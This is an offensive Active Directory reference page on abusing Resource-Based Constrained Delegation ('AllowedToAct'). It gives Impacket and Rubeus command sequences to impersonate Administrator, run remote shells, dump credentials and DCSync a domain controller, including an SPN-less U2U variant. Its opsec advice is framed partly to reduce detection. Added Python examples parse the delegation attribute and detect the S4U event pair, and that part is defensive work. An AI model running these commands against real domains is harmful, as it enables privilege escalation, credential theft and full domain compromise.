AllowedToAct
The source principal is listed in the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, meaning it can perform Resource-Based Constrained Delegation (RBCD) against that computer: through S4U2self + S4U2proxy it obtains service tickets to the target as (almost) any domain user and so impersonates that user to the target computer's services.
Applies to: User/Group/Computer → Computer
The source principal must have an SPN configured for S4U2self to return a forwardable ticket; a controlled account without an SPN can still be used through the U2U variant below. The user you impersonate must not be a member of Protected Users or have "Account is sensitive and cannot be delegated" set: for such accounts the S4U2self ticket comes back non-forwardable and the S4U2proxy step is refused.
Linux Abuse
Step 1: Obtain service ticket impersonating target user (source principal already has RBCD rights)
# Source principal is a computer account with known password
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<source-computer>$:<source-password>'
# Source principal via Pass-the-Hash
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> -hashes ':<ntlm-hash>' '<domain>/<source-computer>$'
# AES key
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> -aesKey '<aes-key>' '<domain>/<source-computer>$'
Step 2: Use the ticket for access
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
# Remote execution
wmiexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
smbexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
# Credential dump
secretsdump.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
# Shell
psexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
LDAP pivot: if the target is a DC, take a ticket for the ldap service and DCSync instead
getST.py -spn 'ldap/<dc-hostname>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<source-computer>$:<source-password>'
export KRB5CCNAME=Administrator@ldap_<dc-hostname>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass '<domain>/Administrator@<dc-hostname>.<domain>' -just-dc-ntlm
SPN-less controlled account (U2U)
# Get a TGT for the controlled user (no SPN needed)
getTGT.py '<domain>/<controlled-user>:<password>'
# Extract the TGT's session key; the U2U service ticket will be encrypted with it
describeTicket.py '<controlled-user>.ccache' | grep 'Ticket Session Key'
# Temporarily set the account's NT hash to that session key so the account can decrypt
# the U2U ticket. This is a real password change: the account's normal logons break
# until it is restored, the DC logs it, and the change is subject to the domain
# password policy (minimum age / history can block changing it back), so check first.
changepasswd.py -newhashes ':<session-key>' '<domain>/<controlled-user>:<password>@<dc-ip>'
# Full S4U2self + U2U + S4U2proxy, authenticating with the TGT from the first step
KRB5CCNAME='<controlled-user>.ccache' getST.py -u2u -impersonate Administrator \
-spn 'host/<target-computer>.<domain>' -k -no-pass '<domain>/<controlled-user>'
# Restore the original hash straight away (the account's current hash is the session key)
changepasswd.py -hashes ':<session-key>' -newhashes ':<original-ntlm-hash>' \
'<domain>/<controlled-user>@<dc-ip>'
export KRB5CCNAME=Administrator@host_<target-computer>.<domain>@<domain>.ccache
wmiexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
Verify RBCD is already configured on target
rbcd.py -delegate-to '<target-computer>$' -dc-ip <dc-ip> -action read '<domain>/<username>:<password>'
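What `rbcd.py -action read` (and the PowerView one-liner further down) actually decodes is a self-relative NT security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity; the "source principals" of this edge are simply the SIDs in its ACCESS_ALLOWED ACEs. The following is an added example, not code from the original page, from Impacket or from PowerView: it builds such a descriptor from a list of SIDs and parses one back, so you can check a blob pulled over LDAP offline. Only the MS-DTYP layouts RBCD needs are implemented; the SIDs, the owner choice (BUILTIN\Administrators) and the full-control access mask are assumptions for the demo, not values from the page.

```python
"""Build and decode the msDS-AllowedToActOnBehalfOfOtherIdentity value.

Added example (not from the original page, Impacket or PowerView). The
attribute is a self-relative SECURITY_DESCRIPTOR whose DACL holds one
ACCESS_ALLOWED_ACE per principal allowed to act; the SID in each ACE is
the source principal of the AllowedToAct edge. Demo SIDs are constructed.
"""
import struct
from typing import List, Optional, Tuple

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF           # assumed mask; the KDC keys on the SID, not the mask
BUILTIN_ADMINS = "S-1-5-32-544"     # assumed owner, as in the usual O:BAD:(A;;...) form

# Constructed demo SIDs (assumptions, not accounts from the page).
SOURCE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"   # e.g. the source computer$
OTHER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1106"


def sid_to_bytes(sid: str) -> bytes:
    """Serialize 'S-R-A-S1-...-Sn' into the binary SID layout (MS-DTYP 2.4.2.2)."""
    tag, rev, auth, *subs = sid.split("-")
    if tag != "S":
        raise ValueError("not a SID string: %r" % sid)
    sub_ids = [int(x) for x in subs]
    return (struct.pack("<BB", int(rev), len(sub_ids))
            + int(auth).to_bytes(6, "big")                 # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", x) for x in sub_ids))


def bytes_to_sid(buf: bytes, off: int) -> Tuple[str, int]:
    """Parse a binary SID at offset off; return (sid string, offset just past it)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (rev, auth, "".join("-%d" % x for x in subs)), off + 8 + 4 * count


def build_rbcd_descriptor(allowed_sids: List[str]) -> bytes:
    """Build the descriptor shape RBCD tooling writes: 20-byte header, owner SID, DACL."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header (AceType, AceFlags, AceSize), then Mask, then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    owner_off = 20
    dacl_off = owner_off + len(owner)
    # SECURITY_DESCRIPTOR_RELATIVE: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, owner_off, 0, 0, dacl_off)
    return header + owner + dacl


def allowed_to_act_sids(descriptor: Optional[bytes]) -> List[str]:
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the DACL; empty attribute grants nothing.

    Other ACE types (deny, object ACEs) are skipped by their size so an unexpected
    layout cannot mis-align the parse.
    """
    if not descriptor or len(descriptor) < 20:
        return []
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", descriptor, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, dacl_off)
    off = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", descriptor, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(descriptor, off + 8)   # past 4-byte ACE header + 4-byte mask
            sids.append(sid)
        off += ace_size
    return sids


def can_act(descriptor: Optional[bytes], principal_sid: str) -> bool:
    """True if the principal's SID is listed. Group SIDs count too; resolve membership separately."""
    return principal_sid in allowed_to_act_sids(descriptor)


if __name__ == "__main__":
    blob = build_rbcd_descriptor([SOURCE_SID])
    print("descriptor bytes:", len(blob))
    print("allowed to act:", allowed_to_act_sids(blob))
    print("SOURCE_SID can act:", can_act(blob, SOURCE_SID), "OTHER_SID:", can_act(blob, OTHER_SID))
```

Feed `allowed_to_act_sids` the raw attribute bytes from any LDAP client and compare the result with your own SID list before bothering with getST; an empty list, or a DACL that names only groups you are not in, means this edge does not exist for you.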
Windows Abuse
Step 1: Hash the source principal's password
Rubeus.exe hash /password:<source-password>
Step 2: S4U2self + S4U2proxy
Rubeus.exe s4u /user:<source-computer>$ /rc4:<ntlm-hash> /impersonateuser:Administrator \
/msdsspn:cifs/<target-computer>.<domain> /ptt
# AES256 variant
Rubeus.exe s4u /user:<source-computer>$ /aes256:<aes-key> /impersonateuser:Administrator \
/msdsspn:cifs/<target-computer>.<domain> /ptt
Step 3: Access target
# The injected ticket is for the cifs service only, so SMB works directly
ls \\<target-computer>.<domain>\c$
# WinRM needs a ticket for the http service: rerun the s4u request with /altservice:http
# (Rubeus rewrites the service name, which is not in the encrypted part of the ticket)
Enter-PSSession -ComputerName <target-computer>.<domain>
PowerView β verify RBCD attribute
Get-DomainComputer <target-computer> -Properties msds-allowedtoactonbehalfofotheridentity
Cleanup
Set-DomainObject <target-computer> -Clear 'msds-allowedtoactonbehalfofotheridentity'
Opsec
- The S4U chain shows up as two Event ID 4769 entries on the DC within seconds: the S4U2self request (Account Name = the impersonated user, Service Name = the source account, Transited Services empty) and then the S4U2proxy request (Service Name = the target computer, Transited Services naming the source account). A populated Transited Services field for a delegation pair nobody documented is the signal.
- Prefer AES256 over RC4: an RC4 ticket shows Ticket Encryption Type 0x17 in 4769 and stands out in an AES-only environment (encryption-downgrade detections key on exactly that).
- The impersonated user must not be in Protected Users or flagged "Account is sensitive and cannot be delegated"; for those the S4U2self ticket is non-forwardable and the S4U2proxy request fails.
- RBCD on a DC: request an ldap/ ticket and DCSync with secretsdump rather than cifs/ + psexec, which installs a service and drops a binary on the DC. DCSync has its own tell (Event ID 4662 with the replication GUIDs from a non-DC principal), so it is lower footprint, not invisible.
- The U2U variant changes the controlled account's password twice (Event ID 4723 on the DC) and breaks that account's logons in between; keep the window short.
- If you wrote msDS-AllowedToActOnBehalfOfOtherIdentity yourself (the WriteAccountRestrictions path) rather than finding it already set, clear it when done; with directory object auditing enabled the write is an Event ID 5136.
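The two-request pattern from the first Opsec bullet is easy to turn into detection logic. What follows is an added example, not code from the original page or from any vendor rule set: it runs over a handful of constructed 4769 lines (made-up hosts, addresses and a key=value export format, using the 4769 XML field names), picks out every S4U2proxy ticket by its populated TransitedServices field, looks back for the matching S4U2self from the same client, and flags RC4 tickets. The allow-list of known delegation pairs is an assumption about how you would tune it.

```python
"""Spot the S4U2self + S4U2proxy pair of an RBCD abuse in Event ID 4769 logs.

Added example, not from the original page or any vendor rule set. Sample
lines are constructed for the demo (not real DC logs): one export line per
event, UTC timestamp first, then 4769 fields as key=value pairs.
"""
import re
from datetime import datetime, timedelta

SAMPLE_4769 = [
    # Documented delegation: SRV01$ impersonates Administrator to FS01$ (AES).
    "2024-05-03T10:15:01Z EventID=4769 TargetUserName=Administrator@CORP.LOCAL ServiceName=SRV01$ TransitedServices=- TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.25",
    "2024-05-03T10:15:02Z EventID=4769 TargetUserName=Administrator@CORP.LOCAL ServiceName=FS01$ TransitedServices=SRV01$@CORP.LOCAL TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.25",
    # An ordinary user getting an ordinary service ticket.
    "2024-05-03T10:20:44Z EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=FS01$ TransitedServices=- TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.51",
    # Undocumented pair over RC4: WEB01$ impersonates Administrator to DC01$.
    "2024-05-03T11:02:10Z EventID=4769 TargetUserName=Administrator@CORP.LOCAL ServiceName=WEB01$ TransitedServices=- TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.99",
    "2024-05-03T11:02:10Z EventID=4769 TargetUserName=Administrator@CORP.LOCAL ServiceName=DC01$ TransitedServices=WEB01$@CORP.LOCAL TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.99",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn one export line into a dict; the leading token is the UTC timestamp."""
    ts, rest = line.split(" ", 1)
    ev = dict(FIELD_RE.findall(rest))
    ev["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_rbcd_chains(lines, window=timedelta(seconds=30), known_delegations=frozenset()):
    """Return one alert per S4U2proxy ticket whose (source, target) pair is not allow-listed.

    The S4U2proxy 4769 is the one with a populated TransitedServices: the account
    named there is the delegation source, ServiceName the target. Its S4U2self is a
    4769 shortly before, same client address and impersonated user, ServiceName == source.
    """
    events = sorted((parse_event(l) for l in lines if "EventID=4769" in l), key=lambda e: e["time"])
    alerts = []
    for ev in events:
        if ev.get("TransitedServices", "-") == "-":
            continue                                   # plain TGS-REQ, not S4U2proxy
        source = ev["TransitedServices"].split("@")[0]
        target = ev["ServiceName"]
        if (source, target) in known_delegations:
            continue
        s4u2self = [e for e in events
                    if e.get("TransitedServices", "-") == "-"
                    and e["ServiceName"] == source
                    and e["TargetUserName"] == ev["TargetUserName"]
                    and e["IpAddress"] == ev["IpAddress"]
                    and timedelta(0) <= ev["time"] - e["time"] <= window]
        alerts.append({
            "time": ev["time"].isoformat(),
            "impersonated": ev["TargetUserName"],
            "source": source,
            "target": target,
            "client": ev["IpAddress"],
            "s4u2self_seen": bool(s4u2self),
            "rc4_downgrade": ev.get("TicketEncryptionType", "").lower() == "0x17",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_rbcd_chains(SAMPLE_4769, known_delegations={("SRV01$", "FS01$")}):
        print(alert)
```

Seed `known_delegations` from the msDS-AllowedToActOnBehalfOfOtherIdentity and msDS-AllowedToDelegateTo values you actually intend to have; anything else that transits is either an undocumented delegation or this edge being abused, and an RC4 ticket in an AES domain narrows it further.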